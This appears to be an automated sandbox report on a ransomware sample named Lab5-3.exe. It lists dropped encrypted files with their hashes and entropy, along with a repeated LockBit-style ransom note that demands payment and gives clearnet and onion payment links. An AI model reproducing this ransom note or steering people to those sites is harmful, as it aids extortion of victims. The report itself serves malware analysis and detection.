                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23216
                                                                                                          Entropy (8bit):7.992661365628426
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:6ZsRaov4r3657kx/BCkXdc3/WuHpVtCBetrvX7aPLNfsn/FL+tb:b7v4LmG/TmPH9C8trv7azg6Z
                                                                                                          MD5:6C8F33324D9FDDD87EDC9AD410C0201A
                                                                                                          SHA1:52BEDF83C58393AC35B803724959749BE1870113
                                                                                                          SHA-256:C827E02EF69F89AD30C518AC85A43A808E71F69A6B753F5E45D17769EC16C3E4
                                                                                                          SHA-512:95B1692041F15E1F553878097D9C19C3087D34C15175C4D2F02BE376966E86EDB3B5F3A4A3B9FF0865F4F270F31E6EA46AFE62E996D90597FEBA87250FB02308
                                                                                                          Malicious:true
                                                                                                          Preview:qq.e..).:r9......_D...d...A..T.m....kcw...^...i3$..L...Z.D.0...#.=Z..`.v..}...w....n..u.S.!....(.q..'.j..z....].Z...Av.[....w.,...!^....e.^..y.j..8..vE...`fN..szz./.7.H..8m..f..I.As.....S..o`x0>>.{.m)p.5.|;.X.IT..v}Z.Y.>...J..+.JFH..../...s"~...n.,..>A7........pr..y...t...H"....z>..f..............5i~.fS..L.O....,S..5.......6......h..<f..B....w.......5......nY_w.ui.C$..2$N...|7j..>u..r........(.7...."rf\...=y..KBY...GS?N..u....n.?'E..W.t.B.c.U...ek....JE;}*............|..G.._..7.2..E.c\Vm.T....A....9.aU9....).C......K.d.?..e....l>....v..FH....5*I..,..lx..x S.)T.iI;...q\H*...bi.&`.....CR.5*.z....*..^9.=.Uc@|.9............$.((....[v..>.(..b....C.T..C+.'.b)j..Y.....F..9..#.[.3*...LFC(..&...1N..n&.[..t.........-.-...NH..P...8.g.`....."ssY`.f..ZP..T..%J...K._.B.......W.<.....b.a.^.c...4.V.Z.[.....M.lBR...hN.b.....SR.._yqh..TwN..t.tpX.j....~C7...|........4.z....e..[..m.z...Q.........`...-..D.....k7..5.*..Z&..`..y.t..3...M.D.N..#..f.R.By..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17472
                                                                                                          Entropy (8bit):7.989790355739758
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:l8FeSezWkTm87s5o4VCB+vzGZumDQogAmfhw0jiJ8D5LnKcOX1Wtjytb:OF9Imc4VIOiVkogJLlLKHFWMZ
                                                                                                          MD5:65D3D8B28A23CB517D8F7420E9AC5630
                                                                                                          SHA1:EA10214978CDC3847FB70CE56A1D42B543306276
                                                                                                          SHA-256:5E7375DE68BE8B9A445147AE486273EA10B036A082CFBDEDCBBD834916B1F110
                                                                                                          SHA-512:3EDFE4C34A7D22481A760D8C9C482DA96490099D09419D1BB0B7FC97BA86BBBCFB9907E95236AE1316BD4480EB1ED24771C0C9B881F9DFA637977B3EC3022D1D
                                                                                                          Malicious:false
                                                                                                          Preview:R...g.~....6T..U..1l]E.*........8.+.'...!..:.>........[...j.09$.J...> . ..(...7J.$...'....^..|./.t.2.......4...XJ7b..e...].s6...#....O......(k....|Z.uZC.X:t...a0.....Q"....D.6~=.p"qu.a.m..oi..J.>..F.....)C:J..3?.~.... $#k...sr.&..Oi.+.-!...S.4g.........%..{..w.R$.st....3..v:C..b....:.a.[56.$...Y...L9.......(.N.B.....w..`..7F[&.......r.!NB.F%O2.dC&..#....:OU...|...q6...8..A...=.lM6.6.=.9'..l......ad.j.7&~.m.8.".>N.?.CO<.u....w$~....a.z.-.]..}....j..3#n.._.c...(.....2.~#....u.!3..e.....D@A...<.N.$...9f...P...%@>l.s.....%..X.G...Q.5BD.N..7.yT.(..w...q.7.8.+.v.$.'.Z0....C...5..wI@..TJ..=...1...S.?3.a.G......UL....T3.(-.+w...F....SR.....N!.D..U.:....,.x.5....xx..|r..^..|m...E.@B.....r...j.....KE.A.Pr..3.j#o.t.O...~..#%.......7=...wPG...Y..7..e..|..S..T... .gQ.|........_c.=U.3n....z`..!V..Mw.".J.=5H.6.tQ...W..yK..@...M.`.ZS>....pfU...Bt,....K...}88xi.....aE.#..2+Pws}.H...X...!..'y.X#.8.T....U*`?.. ... .6..k..7...Q....+...Z..b.uW....HX..vR(b.r.(j.JY
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16464
                                                                                                          Entropy (8bit):7.989693360760491
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:1H10oXz6yHq2Kecl3pLBuJx1Qg09noWTSe1yfFZDg6GWatb:nJj6Acl3I1QrnnbyfTK1Z
                                                                                                          MD5:CA1C590C532942788D1B4D2DDCB1CE40
                                                                                                          SHA1:B266BF6156FCC8FB91545D9E9116F7A663952F0D
                                                                                                          SHA-256:AD7E1A43746B86A37B2F413A87A1FBB4B0FE098C0CC72090A78C7DA21C4A683E
                                                                                                          SHA-512:CF86EC1D0481973892BE2CA90121EEB52C7448866B6963616B571B66E8800A7ACA3AEC66E1F361D805521C777204C30DBBCB83BE04E780AF0FCEA8F49A92528B
                                                                                                          Malicious:false
                                                                                                          Preview:..;4.QR.......k.U...` qpj(...~Q-.O..2...y............c..S"D..Lz..J.2F.Is....-..F....4.....8..Tz...?r.X.......]U.J...F......:....4.p\j....w.PH...w..s.%k.R..6.HR.D.<.).o......0.pS.S.9.<x8..k%b\+|'"S..|. .s..i..B..@e.....b......<........PRx...lb"dJ...r.K|...g.3m..q..f...rni...l..6...k0.m..;.mh.~r...@.+.....6l-...[,..C........5..].J.0K.....$FV.w..#...E....x.G...9L}./b^='x....|Jm4F.9..H..6...K9.....x..V....)...-...^...v...E.-........|...q...m..<w.)..A...u.N..0..ka2.F...9....r.M..N~.0..t.b/....q......C.....k]}dii..86....!..R..]q...u.of6.>..[L.mnD.4,._...-/..#]..5.()...<!7.X....A7.>.....+Gk...[....?..g...[....^N.K5.r...B\...I...B..M...8.(..5..........D.;.....g.5.*){d../.,.ry^.b.K..}_uS........{.p...\.Q...P..`*.3a...A{..A8|.7....XOc......^L*.v.....6.oU0..C..#.....,s.......h.9..d..o^........&5..........0eM`.*...x+e....~.-9C.3..].z.~....YR5.,.Z.X...-..!..>!A....r..*.T..R`.....Hi.$42...qJ....9 .....0SR._.Li.#....7F"..>.r..(B.X../.j
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16560
                                                                                                          Entropy (8bit):7.990422218437896
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:Eb0t6VBcQ8LPK+W9La4NEUSPbes/A3hIRtR+s5kXECeSs9T2Outb:Eb0t6VaQ8W/9LPEPVj/R+YTSs9OZ
                                                                                                          MD5:A22A8D1FD178A4FE3466239774FB238F
                                                                                                          SHA1:B3835916066E5F026B005CE62D949DA5DEC6CCB4
                                                                                                          SHA-256:81DF4E0C37D6D826813E8E985EC0AA817F677D20CC99D649D85F1E0ABADF8C17
                                                                                                          SHA-512:FBF785FE4FC86F457AE708668F08A61CAEC1C3544E7F5B2B188A91C89A0177F0B6057A7B5E351C653567D04023C245B163493CCEEA3657697F7BBCE2047A9AC3
                                                                                                          Malicious:true
                                                                                                          Preview:..}.2.#...7....C..H;.fn...zD.n..cF.5...Co..1.Pt.t...x.q}}..;.-.3.,.p~]a[..b.?.2.L&...?F..l.a......iF...6.-j..?O...KX.+....Ag.'B..9..'........F......A*.N.!v.<....S{J........,e..E.}...yJl%.......nTi..y......e..#C.61..42..l`.*%%.l...z.:..]."..8$R.m.._.qZ..<....R....\7?HY..V..D.o.j.v...B.u%.].........6.....<2...........I..&...]...kx.....k......O.....y.h~....B.r<.z.}....?H.D`*..{2..nQA..@M(..+o_/.pt..MM.7f..#..y.(.,.g..G_.cw.F..j.......+.I.7.s.ua..~.s...H...f'.C.....6...........li.....1.IV.P!...b....$.L;....`t..M.1^k.X..1.g.#Z.~.=.>1i.t.....>YYa.....lD...O..E*.U.kQ.V...E..GE..Ix;Mj!G.....Bp.!...n.W....[..........=..[...{-.HM..E-_..0.....In...........fRO..k.`..j/..e.p.v..ls"'.f.= .pt.R..E^..8....4I...<....(.3.....9Pw>.....-s.-.;.J...!u....}-.m..w:Rx*Q.3.s............. .....s'}..>5%.a.'J..fbZ.a.d.;)c(M5s.....1Z...Xbb......`.z....,.f20..V|.mP.B.....r..Nqm.k\.l..\....`..,Y.........b%.7...4..-.+..(.s*f.M..Q....#.......`;-.m=.M....*W;0.T.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16656
                                                                                                          Entropy (8bit):7.987997863012382
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:DtEIR7/0o7quKEFjYhM43RKscU8ECzR7kpIbRjtb:DCIR7so7oM43yUJqQeZ
                                                                                                          MD5:042B145027FC0F9D689F39A3DF8612D1
                                                                                                          SHA1:7E185EDCEBDBF0AC31F401BC76ADABB3E57434F0
                                                                                                          SHA-256:B122E8D7B141F12A2A179E0547224125A683A0A223C50D560291979F872A1C66
                                                                                                          SHA-512:AF1E2818F0606AF0EC43CB5F50EA3DDA174E0A900D3904805EAC17768908D8F472185710F1582A32363552AD24759F1683C3F660726AC8F6123AB45BAE61FBBE
                                                                                                          Malicious:false
                                                                                                          Preview:L I..._^9V.*)~...9..Y.sp^".A......D..... .3T.s.k....@..@...y..?.....%..>.f.J..k.'.v...q3Z.E........Zm.Z..w.yF:8...S...H.1U6\.......:iZ.-..s..x... .JB....#B.n.}0Y..n.AQ...V.{.._.W.D.@........|....X$.3G).W..^.$..j.*w.....P...6d..Haf\[_..!=.S>....Ma.....Q.s ...$xCM4...)~..W...G.a..=.k...-p`.p..?[...@...Y....=....tB.#v....F6.<..9..(,.t*.].'Cj..&..X0.&R.T...o.|.....3iapmV.S..4.@)R@.K.<.....N..T.`L...F.'.9e.@.bc..{.......1.O.....g<..'.P.'$:.g\...,+wA.w...r..H~..R.M......k\)l.....pI....,....bs.KRuo.B61d...U..v.KMI..j.\.....C......j...}.e..Y[.+....p\.\!.O1"3.U.........4...J8........3.....^.g.....]yr}..`C'.s9.P..7L.....3.K..8E}.[(.x......3,5..S.[....j..\.1..F.Fx.yf..-.30FY.^.W.x...>.....&.9&.-...9.!e..w........#..C9..\.X.s..U.?..)&Q.~.'...#.K....=.J=.......='.e(...@x...A.....U.<h...n.......W.A0.|..k"'.e........&.........re......D...q\....]....j...k/d..U,...;.Bp..B.w.D..W.u~.h..,O......A./....@...W.V...H>...S........u.-....4...iy"...Q.m.6
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2704
                                                                                                          Entropy (8bit):7.935238389398653
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:9VQgQw9lRuaSrSiFju3rX+HfUTid3hBaUoSGFcmeykEdEElU92i:9+gjKvu3rBGx0uKeY2ElUJ
                                                                                                          MD5:9D479CF549562B3A4CDAFA23A9E1B1BE
                                                                                                          SHA1:7D98644DB97A8A3CC810DEBD76430B6D330114E1
                                                                                                          SHA-256:F4B679111E0D35767126EDE0F3266286D2149CB5CCDB19CFD12A3EC2400B1556
                                                                                                          SHA-512:7CE308B40B5CB4F3975D686A694D4F5D115AB35EB687A707CF364506B10ADE97CC8950F1E79B7D3070A39ADFA37578482DEB79022339A323C8C961BDAA38A6D9
                                                                                                          Malicious:false
                                                                                                          Preview:..u..I.*ddF?r..]K.'0\|......cP.,../$.85....z.6mN)VOP..H...Fr.+;.4..y.?-..!...Cn}+..b$.Z ..-...D...W.>.|...M.'..K_.Q.h.Z......[....K...26f2.X(..<v.<jSJ\.EjC(4..... k./.....Z...c...+......Z\a.z.S*..*.6...E.iQ.....2N..]o.w.H.#..z.:.R..4+zSAI...;.}=.Tc........q...2)......`VB...J.TS>..Cp..r.U.D0Mav.<.E...!..<...1..".....Y4.,....,C}.r..EI}.....CG..e.t..t~.O.......S.hOM..8c]...TO".t.3.^}...Z(..DP^d.=$..C....S..t.wB^e....\.M=>.|_.n....>.g......R.C..c.\.u.Z.%....;..[m...S. ..,{T......R..]....CK.1Q..U.g.......,..Q....F.$.#.V.zt..4.@../.........Z)2.t.'0.......".......|..j+.].0.P......d>+.A..)...."..eT.W*l.....<k^..b.!...O.J2Q..R.........R6a......G,+...DUz.(2.<5.-%@$....s.,...v.~!.R.....8`.LK..B....m..B.&.+..t9..0&(.^XV4(...}....&...6...>...|I.........:f;....?......%.KD..o.....f22.wt%.......U..i..a.I5...D.v.h..O ....0O....x.@._..<......i..~....f.b7..."X?h..K...qda.%a;."}-!....zL....%v.........*.3.V^.[!.\......?..`.:.}.^..;:...&....qm<.sn.........AK.T ..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23552
                                                                                                          Entropy (8bit):7.992543762494322
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:TqSUVei8t8EZ6+qavGffywhrf4JHDGBOVnl3xZKMR6tZBHKd8BXPtb:TqSUgt8EZcuVHHxSwqXPZ
                                                                                                          MD5:DF6AA674D2241C9BDA201BE117BDC536
                                                                                                          SHA1:32FA2C0E355BBE59AA2021AD76B3D4BF188851A4
                                                                                                          SHA-256:3A05C859998E6A709E35F5C9FE6DE8EFFAF0CA2BC0768FBF4D983523D28003E5
                                                                                                          SHA-512:59B00B1F6B7FE6325E76F4AAD3759A24D4EC714ED8934A3B470AED482A121FFD92F9F5581CA9E4A30A66F3EE3AA5C78AB5CCDBCED3F6EAB922DDE735AAED9A98
                                                                                                          Malicious:true
                                                                                                          Preview:.8....&.b...P.....u.a.RM..1.w...s.e..g}..N...........{.J....*A`..A4:.W.}7.^.x....&.8.(.g..s.+T.O..q.`.....=.s..C...b.H2.."._..?......%...r..q.y......?....(;....zw.S....@t.._?.....@-....g..e...lZr....\.d.Y,..6..p.......).L._mV../(.l.>..Q..8]....I.2!...-.N..z.w..XT.._.._ST'c..`.~.....$...c.7L.%u..WU........=c.y.I.2..)q..#%.'...Q.Pk...\.$.^ vr...[BU.^...R.k\.<.<!........=...@B.u...?qB;..Z.$9n..".."... ..yT.7.....R.i.Q...k..Q.dP...p8.o,...W.#.K.n.i9.. ."l.;U`.......*..Y'.T..v.$.J...aI-.2@Q.....@...#...#....._.Uk..%.a..+.(.O..F..W......>.H~.*2o..v.-..>...k*.Sn..}5y..j..FQ.......;..h...4MD .H...#..j...q.N.ltJ..R...F..@^z7..p.2......f......c..............r0....T|...;hj=...M.pp...dl..;.....l..i..?....,..<...d....V...3.zZ...n..8.\.......~.d.e..:+.....4.}...uJs...@Z.....$...w..x..W......Pr4._..O...F...I........W.z....uV.`.H8[vy...l,IA#.u...K..L....j...Q...G{......<9....>Z1..X.W....0.==V.?/.<y...a"...f..T..fO?u.....CnbW..g...n4.t.0..O.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15808
                                                                                                          Entropy (8bit):7.987646368634972
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:eKZTQOUdh9sd/cZ5UCHz+YEs+wPZ1KRuEuVeCtb:eKBQtdTA/yUqbx3NVfZ
                                                                                                          MD5:3DE9FE2EFD64A2EF5638C7B97A52D218
                                                                                                          SHA1:6B97F08818555B373A824C8C8F83195A73C93821
                                                                                                          SHA-256:047F8BB97BF1B2848B64647B80F3129991CF5ED95F50682213F277455B0BB2F9
                                                                                                          SHA-512:3D5AF92DE14F930A1A64E3A940457DF68DF7C077BC2C2A91913691E355EBCECAE89EB0473D5C30943B62584F4439E9FB737573F057A6AFC9C60C96848252C02A
                                                                                                          Malicious:false
                                                                                                          Preview:..%=..wb.,.7.(....h.!B.h......./..#.Z|s..2..W.B.R.g.E2\7.vV}\.......|y.....ae.u.J."B_.w.L...k..=.>N...?....5y<........O.......`I.P@....m...&...]4.Z.Yx.YwEh..G...P3...7.v-..).........].....e.*....!]......P%...t.$k..X...6..|..H...DH>.!..-x...w...k.B....6....^..;..!.>..X....A...F...)...f...1Q.$.Vho.....V4S.P.....H..G[._....U../...P...YX.7....bA...?I.E....U..."Wo.0.......7...uF=T......6..:]m]~.r.Tsx..P..g...."Z..,dr......h..NRkQ.....ix6J..og.O......d....;..O).7u.k.;Q....P..V.+..P.5.tN..V>...;q..k....=.ECe..M..O..q..7....J...I<..+Q.....@.SG..,,J.v=.=.....?...n..."....`.....qh..@.^.......nR.@...M_OHb.y7BW.Zoo...h-{..%..h).7i......#Qy..4.....V./..RuM.Gd4e.)..{B9.r....98'.".=@......0qJc%.X......r...3..O.,..m...es8..]+k..."j.X.B..Z.:hXgnZ.T..%"..I\.&.n7....X.k...5...D..0-..c..,i.t.g....!0.....z>i...(.e.v../.=.la#SJ..k.....TY7..o.m.......8...V.....[..a...F.T..~*G..be....4c..K..h`....Zg^.....f?d..c.........(.....r.......,.w.~.VK.M.,EV
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
